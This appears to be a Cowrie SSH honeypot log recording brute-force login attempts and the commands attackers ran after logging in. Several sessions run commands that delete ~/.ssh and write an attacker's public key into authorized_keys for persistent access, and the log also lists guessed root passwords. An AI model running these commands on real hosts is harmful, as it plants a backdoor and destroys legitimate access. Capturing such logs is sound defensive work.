{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:37.940540Z","src_ip":"104.208.108.166","session":"26376f6524d1"}
{"eventid":"cowrie.session.connect","src_ip":"104.208.108.166","src_port":31144,"dst_ip":"1.2.3.4","dst_port":22,"session":"889fed686e48","protocol":"ssh","message":"New connection: 104.208.108.166:31144 (1.2.3.4:22) [session: 889fed686e48]","sensor":"my-vps","timestamp":"2025-08-26T11:12:38.147874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:12:38.148770Z","src_ip":"104.208.108.166","session":"889fed686e48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:12:38.356170Z","src_ip":"104.208.108.166","session":"889fed686e48"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:12:39.228821Z","src_ip":"104.208.108.166","session":"889fed686e48"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:39.437705Z","src_ip":"104.208.108.166","session":"a55d9a79928a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:12:39.438594Z","src_ip":"104.208.108.166","session":"889fed686e48"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":59280,"dst_ip":"1.2.3.4","dst_port":22,"session":"c942f8b21da4","protocol":"ssh","message":"New connection: 196.251.86.249:59280 (1.2.3.4:22) [session: c942f8b21da4]","sensor":"my-vps","timestamp":"2025-08-26T11:13:29.328727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:13:29.941015Z","src_ip":"196.251.86.249","session":"c942f8b21da4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:13:29.941717Z","src_ip":"196.251.86.249","session":"c942f8b21da4"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"test","message":"login attempt [hadoop/test] failed","sensor":"my-vps","timestamp":"2025-08-26T11:13:32.117947Z","src_ip":"196.251.86.249","session":"c942f8b21da4"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:13:33.755944Z","src_ip":"196.251.86.249","session":"c942f8b21da4"}
{"eventid":"cowrie.session.connect","src_ip":"158.174.210.161","src_port":19054,"dst_ip":"1.2.3.4","dst_port":22,"session":"b149fd31ec4f","protocol":"ssh","message":"New connection: 158.174.210.161:19054 (1.2.3.4:22) [session: b149fd31ec4f]","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.206623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.207936Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.241594Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.login.success","username":"root","password":"ricardo","message":"login attempt [root/ricardo] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.414619Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:13:39.533506Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.534195Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.535418Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.569936Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:13:39.710466Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T11:13:39.711284Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T11:13:40.163888Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:13:40.164922Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.session.connect","src_ip":"158.174.210.161","src_port":28491,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d6a1bf091c0","protocol":"ssh","message":"New connection: 158.174.210.161:28491 (1.2.3.4:22) [session: 8d6a1bf091c0]","sensor":"my-vps","timestamp":"2025-08-26T11:13:40.196176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:13:40.197918Z","src_ip":"158.174.210.161","session":"8d6a1bf091c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:13:40.230173Z","src_ip":"158.174.210.161","session":"8d6a1bf091c0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T11:13:40.402140Z","src_ip":"158.174.210.161","session":"8d6a1bf091c0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:13:41.437889Z","src_ip":"158.174.210.161","session":"8d6a1bf091c0"}
{"eventid":"cowrie.session.connect","src_ip":"158.174.210.161","src_port":65449,"dst_ip":"1.2.3.4","dst_port":22,"session":"7373ee183b82","protocol":"ssh","message":"New connection: 158.174.210.161:65449 (1.2.3.4:22) [session: 7373ee183b82]","sensor":"my-vps","timestamp":"2025-08-26T11:13:41.470193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:13:41.471189Z","src_ip":"158.174.210.161","session":"7373ee183b82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:13:41.504086Z","src_ip":"158.174.210.161","session":"7373ee183b82"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:13:42.161174Z","src_ip":"158.174.210.161","session":"7373ee183b82"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:13:42.196580Z","src_ip":"158.174.210.161","session":"b149fd31ec4f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:13:42.197670Z","src_ip":"158.174.210.161","session":"7373ee183b82"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":43436,"dst_ip":"1.2.3.4","dst_port":22,"session":"64c36e103e00","protocol":"ssh","message":"New connection: 45.88.8.186:43436 (1.2.3.4:22) [session: 64c36e103e00]","sensor":"my-vps","timestamp":"2025-08-26T11:14:18.869625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:14:19.412388Z","src_ip":"45.88.8.186","session":"64c36e103e00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:14:19.413043Z","src_ip":"45.88.8.186","session":"64c36e103e00"}
{"eventid":"cowrie.login.success","username":"root","password":"11223344","message":"login attempt [root/11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:14:23.440082Z","src_ip":"45.88.8.186","session":"64c36e103e00"}
{"eventid":"cowrie.session.connect","src_ip":"35.244.25.124","src_port":58708,"dst_ip":"1.2.3.4","dst_port":22,"session":"3058f9788d1d","protocol":"ssh","message":"New connection: 35.244.25.124:58708 (1.2.3.4:22) [session: 3058f9788d1d]","sensor":"my-vps","timestamp":"2025-08-26T11:14:24.367966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:14:24.377362Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:24.537970Z","src_ip":"45.88.8.186","session":"64c36e103e00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T11:14:24.613733Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.login.success","username":"root","password":"vpn@123","message":"login attempt [root/vpn@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:14:25.612049Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:14:26.135978Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:14:26.136961Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T11:14:26.138266Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:26.365815Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:14:26.926870Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T11:14:26.927569Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T11:14:27.119176Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:14:27.120336Z","src_ip":"35.244.25.124","session":"3058f9788d1d"}
{"eventid":"cowrie.session.connect","src_ip":"35.244.25.124","src_port":59392,"dst_ip":"1.2.3.4","dst_port":22,"session":"084b8a502842","protocol":"ssh","message":"New connection: 35.244.25.124:59392 (1.2.3.4:22) [session: 084b8a502842]","sensor":"my-vps","timestamp":"2025-08-26T11:14:27.360391Z"}
